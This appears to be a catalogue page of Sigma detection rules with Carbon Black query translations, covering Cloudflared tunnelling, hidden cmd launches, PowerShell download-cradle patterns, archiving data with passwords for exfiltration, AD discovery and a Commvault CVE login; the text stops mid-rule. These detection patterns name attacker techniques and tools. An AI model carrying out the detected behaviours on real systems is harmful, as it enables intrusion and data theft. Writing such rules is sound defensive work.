VMware Carbon Black detection rules

medium Strong High FP

Cloudflared Tunnel Execution

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

status test author Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4

carbon_black query

(CommandLine:\ tunnel\ * CommandLine:\ run\ *) (CommandLine:\-config\ * OR CommandLine:\-credentials\-contents\ * OR CommandLine:\-credentials\-file\ * OR CommandLine:\-token\ *)

view Sigma YAML

title: Cloudflared Tunnel Execution
id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4
status: test
description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
references:
    - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group
    - https://github.com/cloudflare/cloudflared
    - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps
author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-17
modified: 2023-12-20
tags:
    - attack.command-and-control
    - attack.t1102
    - attack.t1090
    - attack.t1572
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' tunnel '
            - ' run '
        CommandLine|contains:
            - '-config '
            - '-credentials-contents '
            - '-credentials-file '
            - '-token '
    condition: selection
falsepositives:
    - Legitimate usage of Cloudflared tunnel.
level: medium

Convert to SIEM query

medium Moderate High FP

Cloudflared Tunnels Related DNS Requests

Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id a1d9eec5-33b2-4177-8d24-27fe754d0812

carbon_black query

QueryName:.v2.argotunnel.com OR QueryName:protocol\-v2.argotunnel.com OR QueryName:trycloudflare.com OR QueryName:update.argotunnel.com

view Sigma YAML

title: Cloudflared Tunnels Related DNS Requests
id: a1d9eec5-33b2-4177-8d24-27fe754d0812
related:
    - id: 7cd1dcdc-6edf-4896-86dc-d1f19ad64903
      type: similar
status: test
description: |
    Detects DNS requests to Cloudflared tunnels domains.
    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
references:
    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-12-20
tags:
    - attack.command-and-control
    - attack.t1071.001
    - attack.t1572
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - '.v2.argotunnel.com'
            - 'protocol-v2.argotunnel.com'
            - 'trycloudflare.com'
            - 'update.argotunnel.com'
    condition: selection
falsepositives:
    - Legitimate use of cloudflare tunnels will also trigger this.
level: medium

Convert to SIEM query

medium Strong Medium FP

Cmd Launched with Hidden Start Flags to Suspicious Targets

Detects cmd.exe executing commands with the "start" utility using "/b" (no window) or "/min" (minimized) flags. To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories. This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.

status experimental author Vladan Sekulic, Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d

carbon_black query

((Image:\\cmd.exe OR OriginalFileName:Cmd.Exe) (CommandLine:start\ * OR CommandLine:start\/b* OR CommandLine:start\/min*) (CommandLine:\-b\ * OR CommandLine:\/b\ * OR CommandLine:–b\ * OR CommandLine:—b\ * OR CommandLine:―b\ * OR CommandLine:\-b\"* OR CommandLine:\/b\"* OR CommandLine:–b\"* OR CommandLine:—b\"* OR CommandLine:―b\"* OR CommandLine:\-min\ * OR CommandLine:\/min\ * OR CommandLine:–min\ * OR CommandLine:—min\ * OR CommandLine:―min\ * OR CommandLine:\-min\"* OR CommandLine:\/min\"* OR CommandLine:–min\"* OR CommandLine:—min\"* OR CommandLine:―min\"*)) ((CommandLine:\:\\Perflogs\\* OR CommandLine:\:\\Temp\\* OR CommandLine:\:\\Users\\Default\\* OR CommandLine:\:\\Windows\\Temp\\* OR CommandLine:\\AppData\\Roaming\\* OR CommandLine:\\Contacts\\* OR CommandLine:\\Documents\\* OR CommandLine:\\Downloads\\* OR CommandLine:\\Favorites\\* OR CommandLine:\\Favourites\\* OR CommandLine:\\inetpub\\* OR CommandLine:\\Music\\* OR CommandLine:\\Photos\\* OR CommandLine:\\Temporary\ Internet\\* OR CommandLine:\\Users\\Public\\* OR CommandLine:\\Videos\\*) OR (CommandLine:.bat* OR CommandLine:.cmd* OR CommandLine:.cpl* OR CommandLine:.hta* OR CommandLine:.js* OR CommandLine:.ps1* OR CommandLine:.scr* OR CommandLine:.vbe* OR CommandLine:.vbs*) OR (CommandLine:\ \-nop\ * OR CommandLine:\ \-sta\ * OR CommandLine:.downloadfile\(* OR CommandLine:.downloadstring\(* OR CommandLine:\-noni\ * OR CommandLine:\-w\ hidden\ *))

view Sigma YAML

title: Cmd Launched with Hidden Start Flags to Suspicious Targets
id: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d
status: experimental
description: |
    Detects cmd.exe executing commands with the "start" utility using "/b" (no window) or "/min" (minimized) flags.
    To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories.
    This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.
references:
    - https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous
    - https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions
    - https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start
tags:
    - attack.stealth
    - attack.t1564.003
author: Vladan Sekulic, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-01-24
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmd_img:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName: 'Cmd.Exe'
    selection_cmd_hidden_start_1:
        CommandLine|contains|windash:
            - 'start '
            - 'start/b'
            - 'start/min'
    selection_cmd_hidden_start_2:
        CommandLine|contains|windash:
            - '/b '
            - '/b"'
            - '/min '
            - '/min"'
    selection_cli_uncommon_location:
        CommandLine|contains:
            - ':\Perflogs\'
            - ':\Temp\'
            - ':\Users\Default\'
            - ':\Windows\Temp\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Documents\'
            - '\Downloads\'
            - '\Favorites\'
            - '\Favourites\'
            - '\inetpub\'
            - '\Music\'
            - '\Photos\'
            - '\Temporary Internet\'
            - '\Users\Public\'
            - '\Videos\'
    selection_cli_susp_extension:
        CommandLine|contains:
            - '.bat'
            - '.cmd'
            - '.cpl'
            - '.hta'
            - '.js'
            - '.ps1'
            - '.scr'
            - '.vbe'
            - '.vbs'
    selection_cli_susp_pattern:
        CommandLine|contains:
            - ' -nop '
            - ' -sta '
            - '.downloadfile(' # PowerShell download command
            - '.downloadstring(' # PowerShell download command
            - '-noni '
            - '-w hidden '
    condition: all of selection_cmd_* and 1 of selection_cli_*
falsepositives:
    - Legitimate administrative scripts running from temporary folders.
    - Niche software updaters utilizing hidden batch files in ProgramData.
level: medium # Can be increased after an initial baseline and tuning
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml

Convert to SIEM query

medium Moderate High FP

Code Execution via Pcwutl.dll

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

status test author Julia Fomina, oscd.community ATT&CK sub-technique id 9386d78a-7207-4048-9c9f-a93a7c2d1c05

carbon_black query

(Image:\\rundll32.exe OR OriginalFileName:RUNDLL32.EXE) (CommandLine:pcwutl* CommandLine:LaunchApplication*)

view Sigma YAML

title: Code Execution via Pcwutl.dll
id: 9386d78a-7207-4048-9c9f-a93a7c2d1c05
status: test
description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
references:
    - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/
    - https://twitter.com/harr0ey/status/989617817849876488
author: Julia Fomina, oscd.community
date: 2020-10-05
modified: 2023-02-09
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains|all:
            - 'pcwutl'
            - 'LaunchApplication'
    condition: all of selection_*
falsepositives:
    - Use of Program Compatibility Troubleshooter Helper
level: medium

Convert to SIEM query

medium Strong High FP

CodePage Modification Via MODE.COM To Russian Language

Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.

status test author Joseliyo Sanchez, @Joseliyo_Jstnk ATT&CK technique id 12fbff88-16b5-4b42-9754-cd001a789fb3

carbon_black query

(Image:\\mode.com OR OriginalFileName:MODE.COM) ((CommandLine:\ con\ * CommandLine:\ cp\ * CommandLine:\ select=*) (CommandLine:=1251 OR CommandLine:=866))

view Sigma YAML

title: CodePage Modification Via MODE.COM To Russian Language
id: 12fbff88-16b5-4b42-9754-cd001a789fb3
related:
    - id: d48c5ffa-3b02-4c0f-9a9e-3c275650dd0e
      type: derived
status: test
description: |
    Detects a CodePage modification using the "mode.com" utility to Russian language.
    This behavior has been used by threat actors behind Dharma ransomware.
references:
    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode
    - https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html
    - https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-01-17
tags:
    - attack.stealth
    - attack.t1036
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behavior:"mode con cp select=1251"
    # VT Query: behavior:"mode con cp select=866"
    selection_img:
        - Image|endswith: '\mode.com'
        - OriginalFileName: 'MODE.COM'
    selection_cli:
        CommandLine|contains|all:
            - ' con '
            - ' cp '
            - ' select='
        CommandLine|endswith:
            - '=1251' # ANSI Cyrillic; Cyrillic (Windows) - Observed ITW by Dharma ransomware
            - '=866' # OEM Russian; Cyrillic (DOS) - Observed ITW by other malware
    condition: all of selection_*
falsepositives:
    - Russian speaking people changing the CodePage
level: medium

Convert to SIEM query

medium Moderate High FP

Command Line Execution with Suspicious URL and AppData Strings

Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)

status test author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community ATT&CK sub-technique id 1ac8666b-046f-4201-8aba-1951aaec03a3

carbon_black query

Image:\\cmd.exe (CommandLine:http* CommandLine:\:\/\/* CommandLine:%AppData%*)

view Sigma YAML

title: Command Line Execution with Suspicious URL and AppData Strings
id: 1ac8666b-046f-4201-8aba-1951aaec03a3
status: test
description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
references:
    - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100
    - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2019-01-16
modified: 2021-11-27
tags:
    - attack.execution
    - attack.command-and-control
    - attack.t1059.003
    - attack.t1059.001
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'http' # captures both http and https
            - '://'
            - '%AppData%'
    condition: selection
falsepositives:
    - High
level: medium

Convert to SIEM query

medium Moderate Medium FP

Communication To Uncommon Destination Ports

Detects programs that connect to uncommon destination ports

status test author Florian Roth (Nextron Systems) ATT&CK technique id 6d8c3d20-a5e1-494f-8412-4571d716cf5c

carbon_black query

(Initiated:true (DestinationPort:8080 OR DestinationPort:8888)) (-(DestinationIp:127.* OR DestinationIp:10.* OR DestinationIp:172.16.* OR DestinationIp:172.17.* OR DestinationIp:172.18.* OR DestinationIp:172.19.* OR DestinationIp:172.20.* OR DestinationIp:172.21.* OR DestinationIp:172.22.* OR DestinationIp:172.23.* OR DestinationIp:172.24.* OR DestinationIp:172.25.* OR DestinationIp:172.26.* OR DestinationIp:172.27.* OR DestinationIp:172.28.* OR DestinationIp:172.29.* OR DestinationIp:172.30.* OR DestinationIp:172.31.* OR DestinationIp:192.168.* OR DestinationIp:169.254.* OR DestinationIp:\:\:1 OR DestinationIp:fe8* OR DestinationIp:fe9* OR DestinationIp:fea* OR DestinationIp:feb* OR DestinationIp:fc* OR DestinationIp:fd*)) (-(Image:C\:\\Program\ Files\\* OR Image:C\:\\Program\ Files\ \(x86\)\\*))

view Sigma YAML

title: Communication To Uncommon Destination Ports
id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c
related:
    - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382
      type: similar
status: test
description: Detects programs that connect to uncommon destination ports
references:
    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
author: Florian Roth (Nextron Systems)
date: 2017-03-19
modified: 2024-03-12
tags:
    - attack.persistence
    - attack.command-and-control
    - attack.t1571
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationPort:
            - 8080
            - 8888
    filter_main_local_ranges:
        DestinationIp|cidr:
            - '127.0.0.0/8'
            - '10.0.0.0/8'
            - '172.16.0.0/12'
            - '192.168.0.0/16'
            - '169.254.0.0/16'
            - '::1/128'  # IPv6 loopback
            - 'fe80::/10'  # IPv6 link-local addresses
            - 'fc00::/7'  # IPv6 private addresses
    filter_optional_sys_directories:
        Image|startswith:
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)

Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password. This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.

status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 917789e1-2c1f-4bf5-8c91-6f71a017f469

carbon_black query

(CommandLine:qlogin* CommandLine:_\+_PublicSharingUser_*) CommandLine:[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

view Sigma YAML

title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
id: 917789e1-2c1f-4bf5-8c91-6f71a017f469
status: experimental
description: |
    Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
    This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
references:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-20
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.initial-access
    - attack.stealth
    - attack.t1078.001
    - detection.emerging-threats
    - cve.2025-57788
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'qlogin'
            - '_+_PublicSharingUser_'
        # Detects the use of a GUID as the password, which is indicative of an exploit attempt
        CommandLine|re: '[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}'
    condition: selection
falsepositives:
    - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
level: medium

Convert to SIEM query

medium Strong Medium FP

Compress Data and Lock With Password for Exfiltration With 7-ZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

status test author frack113 ATT&CK sub-technique id 9fbf5927-5261-4284-a71d-f681029ea574

carbon_black query

(Description:7\-Zip* OR (Image:\\7z.exe OR Image:\\7zr.exe OR Image:\\7za.exe) OR (OriginalFileName:7z.exe OR OriginalFileName:7za.exe OR OriginalFileName:7zr.exe)) CommandLine:\ \-p* (CommandLine:\ a\ * OR CommandLine:\ u\ *)

view Sigma YAML

title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
id: 9fbf5927-5261-4284-a71d-f681029ea574
status: test
description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: frack113
date: 2021-07-27
modified: 2026-06-05
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Description|contains: '7-Zip'
        - Image|endswith:
              - '\7z.exe'
              - '\7zr.exe'
              - '\7za.exe'
        - OriginalFileName:
              - '7z.exe'
              - '7za.exe'
              - '7zr.exe'
    selection_password:
        CommandLine|contains: ' -p'
    selection_action:
        CommandLine|contains:
            - ' a '
            - ' u '
    condition: all of selection_*
falsepositives:
    - Legitimate activity is expected since compressing files with a password is common.
level: medium

Convert to SIEM query

medium Moderate Medium FP

Compress Data and Lock With Password for Exfiltration With WINZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

status test author frack113 ATT&CK sub-technique id e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d

carbon_black query

(CommandLine:winzip.exe* OR CommandLine:winzip64.exe*) CommandLine:\-s\"* (CommandLine:\ \-min\ * OR CommandLine:\ \-a\ *)

view Sigma YAML

title: Compress Data and Lock With Password for Exfiltration With WINZIP
id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d
status: test
description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: frack113
date: 2021-07-27
modified: 2022-12-25
tags:
    - attack.collection
    - attack.t1560.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_winzip:
        CommandLine|contains:
            - 'winzip.exe'
            - 'winzip64.exe'
    selection_password:
        CommandLine|contains: '-s"'
    selection_other:
        CommandLine|contains:
            - ' -min '
            - ' -a '
    condition: all of selection*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong High FP

Computer Discovery And Export Via Get-ADComputer Cmdlet

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 435e10e4-992a-4281-96f3-38b11106adde

carbon_black query

((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) ((CommandLine:Get\-ADComputer\ * CommandLine:\ \-Filter\ \**) (CommandLine:\ >\ * OR CommandLine:\ |\ Select\ * OR CommandLine:Out\-File* OR CommandLine:Set\-Content* OR CommandLine:Add\-Content*))

view Sigma YAML

title: Computer Discovery And Export Via Get-ADComputer Cmdlet
id: 435e10e4-992a-4281-96f3-38b11106adde
related:
    - id: db885529-903f-4c5d-9864-28fe199e6370
      type: similar
status: test
description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
references:
    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-10
modified: 2022-11-17
tags:
    - attack.discovery
    - attack.t1033
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - 'Get-ADComputer '
            - ' -Filter \*'
        CommandLine|contains:
            - ' > '
            - ' | Select '
            - 'Out-File'
            - 'Set-Content'
            - 'Add-Content'
    condition: all of selection_*
falsepositives:
    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
level: medium

Convert to SIEM query

medium Strong High FP

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id db885529-903f-4c5d-9864-28fe199e6370

carbon_black query

(ScriptBlockText:Get\-ADComputer\ * ScriptBlockText:\ \-Filter\ \**) (ScriptBlockText:\ |\ Select\ * OR ScriptBlockText:Out\-File* OR ScriptBlockText:Set\-Content* OR ScriptBlockText:Add\-Content*)

view Sigma YAML

title: Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
id: db885529-903f-4c5d-9864-28fe199e6370
related:
    - id: 435e10e4-992a-4281-96f3-38b11106adde
      type: similar
status: test
description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
references:
    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-17
tags:
    - attack.discovery
    - attack.t1033
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Get-ADComputer '
            - ' -Filter \*'
        ScriptBlockText|contains:
            - ' | Select '
            - 'Out-File'
            - 'Set-Content'
            - 'Add-Content'
    condition: selection
falsepositives:
    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
level: medium

Convert to SIEM query

medium Moderate High FP

Computer Password Change Via Ksetup.EXE

Detects password change for the computer's domain account or host principal via "ksetup.exe"

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id de16d92c-c446-4d53-8938-10aeef41c8b6

carbon_black query

(Image:\\ksetup.exe OR OriginalFileName:ksetup.exe) CommandLine:\ \/setcomputerpassword\ *

view Sigma YAML

title: Computer Password Change Via Ksetup.EXE
id: de16d92c-c446-4d53-8938-10aeef41c8b6
status: test
description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
references:
    - https://twitter.com/Oddvarmoe/status/1641712700605513729
    - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-06
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\ksetup.exe'
        - OriginalFileName: 'ksetup.exe'
    selection_cli:
        CommandLine|contains: ' /setcomputerpassword '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Computer System Reconnaissance Via Wmic.EXE

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f

carbon_black query

(Image:\\wmic.exe OR OriginalFileName:wmic.exe) CommandLine:computersystem*

view Sigma YAML

title: Computer System Reconnaissance Via Wmic.EXE
id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f
status: test
description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
references:
    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-08
modified: 2023-02-14
tags:
    - attack.discovery
    - attack.execution
    - attack.t1047
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        - Image|endswith: '\wmic.exe'
        - OriginalFileName: 'wmic.exe'
    selection_cli:
        CommandLine|contains: 'computersystem'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Conhost Spawned By Uncommon Parent Process

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

status test author Tim Rauch, Elastic (idea) ATT&CK technique id cbb9e3d1-2386-4e59-912e-62f1484f7a89

carbon_black query

(Image:\\conhost.exe (ParentImage:\\explorer.exe OR ParentImage:\\lsass.exe OR ParentImage:\\regsvr32.exe OR ParentImage:\\rundll32.exe OR ParentImage:\\services.exe OR ParentImage:\\smss.exe OR ParentImage:\\spoolsv.exe OR ParentImage:\\svchost.exe OR ParentImage:\\userinit.exe OR ParentImage:\\wininit.exe OR ParentImage:\\winlogon.exe)) (-(ParentCommandLine:\-k\ apphost\ \-s\ AppHostSvc* OR ParentCommandLine:\-k\ imgsvc* OR ParentCommandLine:\-k\ localService\ \-p\ \-s\ RemoteRegistry* OR ParentCommandLine:\-k\ LocalSystemNetworkRestricted\ \-p\ \-s\ NgcSvc* OR ParentCommandLine:\-k\ NetSvcs\ \-p\ \-s\ NcaSvc* OR ParentCommandLine:\-k\ netsvcs\ \-p\ \-s\ NetSetupSvc* OR ParentCommandLine:\-k\ netsvcs\ \-p\ \-s\ wlidsvc* OR ParentCommandLine:\-k\ NetworkService\ \-p\ \-s\ DoSvc* OR ParentCommandLine:\-k\ wsappx\ \-p\ \-s\ AppXSvc* OR ParentCommandLine:\-k\ wsappx\ \-p\ \-s\ ClipSVC* OR ParentCommandLine:\-k\ wusvcs\ \-p\ \-s\ WaaSMedicSvc*)) (-(ParentCommandLine:C\:\\Program\ Files\ \(x86\)\\Dropbox\\Client\\* OR ParentCommandLine:C\:\\Program\ Files\\Dropbox\\Client\\*))

view Sigma YAML

title: Conhost Spawned By Uncommon Parent Process
id: cbb9e3d1-2386-4e59-912e-62f1484f7a89
status: test
description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
references:
    - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-28
modified: 2025-03-06
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\conhost.exe'
        ParentImage|endswith:
            - '\explorer.exe'
            # - '\csrss.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe
            # - '\ctfmon.exe'  # Seen several times in a testing environment
            # - '\dllhost.exe'  # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p'
            - '\lsass.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\services.exe'
            - '\smss.exe'
            - '\spoolsv.exe'
            - '\svchost.exe'
            - '\userinit.exe'
            # - '\wermgr.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe
            - '\wininit.exe'
            - '\winlogon.exe'
    filter_main_svchost:
        ParentCommandLine|contains:
            - '-k apphost -s AppHostSvc'
            - '-k imgsvc'
            - '-k localService -p -s RemoteRegistry'
            - '-k LocalSystemNetworkRestricted -p -s NgcSvc'
            - '-k NetSvcs -p -s NcaSvc'
            - '-k netsvcs -p -s NetSetupSvc'
            - '-k netsvcs -p -s wlidsvc'
            - '-k NetworkService -p -s DoSvc'
            - '-k wsappx -p -s AppXSvc'
            - '-k wsappx -p -s ClipSVC'
            - '-k wusvcs -p -s WaaSMedicSvc'
    filter_optional_dropbox:
        ParentCommandLine|contains:
            - 'C:\Program Files (x86)\Dropbox\Client\'
            - 'C:\Program Files\Dropbox\Client\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Console CodePage Lookup Via CHCP

Detects use of chcp to look up the system locale value as part of host discovery

status test author _pete_0, TheDFIRReport ATT&CK sub-technique id 7090adee-82e2-4269-bd59-80691e7c6338

carbon_black query

ParentImage:\\cmd.exe (ParentCommandLine:\ \-c\ * OR ParentCommandLine:\ \/c\ * OR ParentCommandLine:\ –c\ * OR ParentCommandLine:\ —c\ * OR ParentCommandLine:\ ―c\ * OR ParentCommandLine:\ \-r\ * OR ParentCommandLine:\ \/r\ * OR ParentCommandLine:\ –r\ * OR ParentCommandLine:\ —r\ * OR ParentCommandLine:\ ―r\ * OR ParentCommandLine:\ \-k\ * OR ParentCommandLine:\ \/k\ * OR ParentCommandLine:\ –k\ * OR ParentCommandLine:\ —k\ * OR ParentCommandLine:\ ―k\ *) Image:\\chcp.com (CommandLine:chcp OR CommandLine:chcp\  OR CommandLine:chcp\ \ )

view Sigma YAML

title: Console CodePage Lookup Via CHCP
id: 7090adee-82e2-4269-bd59-80691e7c6338
status: test
description: Detects use of chcp to look up the system locale value as part of host discovery
references:
    - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
author: _pete_0, TheDFIRReport
date: 2022-02-21
modified: 2024-03-05
tags:
    - attack.discovery
    - attack.t1614.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        ParentCommandLine|contains|windash:
